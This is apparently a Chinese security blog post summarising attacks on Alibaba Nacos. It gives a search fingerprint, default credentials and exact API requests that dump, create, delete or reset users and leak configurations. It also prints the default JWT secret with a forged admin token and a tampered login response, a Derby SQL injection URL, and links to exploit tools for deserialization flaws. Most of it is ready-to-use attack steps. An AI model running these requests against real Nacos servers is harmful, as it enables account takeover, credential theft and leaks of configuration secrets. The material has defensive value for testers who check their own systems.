nacos漏洞小结

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

指纹:app="nacos"

默认密码nacos/nacos

漏洞1-权限绕过漏洞

1.1-获取已有的用户列表的账号和密码

在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图

1.2-任意用户添加

更改提交方式为POST , 访问/nacos/v1/auth/users?username=test111&password=test222

新建一个账号test111,可以看到创建用户成功,如图

1.3-任意用户删除

更改提交方式为DELETE , 访问DELETE /nacos/v1/auth/users?username=test111

可以看到用户删除成功,如图

1.4-用户密码重置

更改提交方式为PUT,访问 /nacos/v1/auth/users?username=test1&newPassword=test222

1.5-配置信息泄露

在路径后面加上/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99

洞2-token.secret.key默认配置(QVD-2023-6271)

Nacos使用token.secret.key来进行身份认证和加密。在Nacos版本 <= 2.2.0 时,这个密钥是固定的默认值,导致存在一个安全漏洞。攻击者可以利用这个默认密钥构造JWT,绕过身份认证并进入Nacos后台,从而对系统进行控制。

这个漏洞个人认为是最常见的一个,有一半以上的nacos系统都存在这个洞。

SecretKey012345678901234567890123456789012345678901234567890123456789

填入密钥,填入新的时间戳,勾选secret base64 encoded,获取新的token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwiZXhwIjoiNDA4NjY2MTEyOCIsImlhdCI6MTUxNjIzOTAyMn0.UMQFlbGKwRmxGCNipH9yrtFPcmr934rjPJE8del3q8k

然后在登陆界面输入任意账户密码 ,点击登录。更改改返回包状态码跟body

图片


{
"accessToken":
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwiZXhwIjoiNDA4NjY2MTEyOCIsImlhdCI6MTUxNjIzOTAyMn0.UMQFlbGKwRmxGCNipH9yrtFPcmr934rjPJE8del3q8k",
"tokenTtl": 18000,
"globalAdmin": true,"username":"nacos"
}

然后成功登录nacos账号

洞3-Nacos Derby SQL注入漏洞  (CNVD-2020-67618)

/nacos/v1/cs/ops/derby?sql=select * from users

这是一个注入点

洞4-Nacos 集群 Raft Hessian 反序列化漏洞 反序列化漏洞 (CNVD-2023-45001)

Nacos 1.4.1+在单机模式下默认不开放7848端口,故该情况通常不受此漏洞影响。然而,1.4.0、2.x版本无论单机或集群模式均默认开放7848端口。
所以最终影响范围是:
1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行
2.0.0 <= Nacos < 2.2.3 任意模式启动均受到影响

https://github.com/charonlight/NacosExploitGUI

洞5-Nacos-Client Yaml反序列化

利用:

https://github.com/charonlight/NacosExploitGUI

漏洞6-利用Derby SQL漏洞RCE

https://mp.weixin.qq.com/s/hXtpkc-PNMS8LuXbVRxP5g

https://mp.weixin.qq.com/s/ShAtmPAW2ONCbnza9Da-LA

参考

https://mp.weixin.qq.com/s?__biz=MzkyOTMxNDM3Ng==&mid=2247488470&idx=1&sn=3cf9f8d4d3fd8348e5892153d565b395&chksm=c36f650de5053aab2024fb0fc12322396c554fb03fc8c17adbe4194145c1a89e4b9f51fd62b8&scene=126&sessionid=1713370439&key=58349ff90672df9829e6924cfc57517ee7e58625f070922c45f5af210801e70276eb4a689056fd0960d8dc5f403cbee7615e8a8e7f5f703ce00d812f7fac6d4db56642cfcb63adbe7418c3eec5e10b064bd28f7016ec971ed7a03ca6567bcd1e7fd1c5203e377389a2ec1d468bf1ac8e33296f54599ad5751ad29fde037be74f&ascene=15&uin=NTY2NTA4NjQ%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_26cb3abead85&countrycode=AL&exportkey=n_ChQIAhIQgo%2F0zroKlgleqOV2m0JGURLuAQIE97dBBAEAAAAAANkSNcr3NjcAAAAOpnltbLcz9gKNyK89dVj0%2FT3gG0eYVXjNiToxQo5St79l90A%2BfC9aAki5MgpTumq85GqFI5kijd7yu6Tf1%2F2qBLw4v%2FP5LOaG5iMpZGxGKqJ%2Fu3mSwaimgTVd4tBdAvjxp%2FY8pG7lbYuJ8UqhIPNtD488y8Gl53tMsWzuYB1OdJTPqLzKp0LWxZJuclBE%2FB%2BLrh%2FSWtb3tNRETI5ZhK%2FoQ07KxieCca61IJ03ukMZc7Z0Hyr%2B%2FTcbX5Pf4cu7yHI4pZib9UUekQhMblWsn1EQPuFQYCZr7T0%3D&acctmode=0&pass_ticket=eq8HCji1DfXBOtEbPkSsc2TsXg7z3fUce6vSp7oYpIevjMHBe69CXIaB5taxqR93LsA4cuKuMt3CimuizC5UFg%3D%3D&wx_header=0&fontgear=2&poc_token=HKl_gWajBUI7atk2qu8rrVhwt5Ia6zTmApeYG7JX

https://www.freebuf.com/articles/web/384857.html

https://www.cnblogs.com/thebeastofwar/p/17920565.html

  • 19
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值